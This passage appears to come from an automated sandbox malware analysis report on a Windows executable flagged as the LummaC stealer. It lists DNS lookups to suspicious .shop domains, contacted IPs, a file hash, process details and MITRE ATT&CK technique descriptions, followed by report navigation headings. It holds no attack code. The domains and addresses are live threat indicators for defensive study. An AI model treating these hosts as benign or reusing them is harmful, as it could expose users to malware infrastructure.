Mar 22, 2024 13:54:05.471868038 CET	49735	443	192.168.2.4	172.67.147.173
Mar 22, 2024 13:54:05.472246885 CET	49735	443	192.168.2.4	172.67.147.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 22, 2024 13:54:02.814249992 CET	57667	53	192.168.2.4	1.1.1.1
Mar 22, 2024 13:54:02.906362057 CET	53	57667	1.1.1.1	192.168.2.4
Mar 22, 2024 13:54:02.910864115 CET	63995	53	192.168.2.4	1.1.1.1
Mar 22, 2024 13:54:03.004045010 CET	53	63995	1.1.1.1	192.168.2.4
Mar 22, 2024 13:54:03.009215117 CET	51440	53	192.168.2.4	1.1.1.1
Mar 22, 2024 13:54:03.104690075 CET	53	51440	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 22, 2024 13:54:02.814249992 CET	192.168.2.4	1.1.1.1	0xcf02	Standard query (0)	colorfulequalugliess.shop	A (IP address)	IN (0x0001)	false
Mar 22, 2024 13:54:02.910864115 CET	192.168.2.4	1.1.1.1	0xbc14	Standard query (0)	wisemassiveharmonious.shop	A (IP address)	IN (0x0001)	false
Mar 22, 2024 13:54:03.009215117 CET	192.168.2.4	1.1.1.1	0x95ac	Standard query (0)	relevantvoicelesskw.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 22, 2024 13:54:02.906362057 CET	1.1.1.1	192.168.2.4	0xcf02	Name error (3)	colorfulequalugliess.shop	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2024 13:54:03.004045010 CET	1.1.1.1	192.168.2.4	0xbc14	Name error (3)	wisemassiveharmonious.shop	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2024 13:54:03.104690075 CET	1.1.1.1	192.168.2.4	0x95ac	No error (0)	relevantvoicelesskw.shop		172.67.147.173	A (IP address)	IN (0x0001)	false
Mar 22, 2024 13:54:03.104690075 CET	1.1.1.1	192.168.2.4	0x95ac	No error (0)	relevantvoicelesskw.shop		104.21.33.178	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

relevantvoicelesskw.shop

Target ID:	0
Start time:	09:54:00
Start date:	22/03/2024
Path:	C:\Users\user\Desktop\Ag3ijL3z1w.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ag3ijL3z1w.exe"
Imagebase:	0x60000
File size:	2'444'904 bytes
MD5 hash:	038F01C7AB34D20394B657CE5D5F3152
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ag3ijL3z1w.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
Ag3ijL3z1w.exe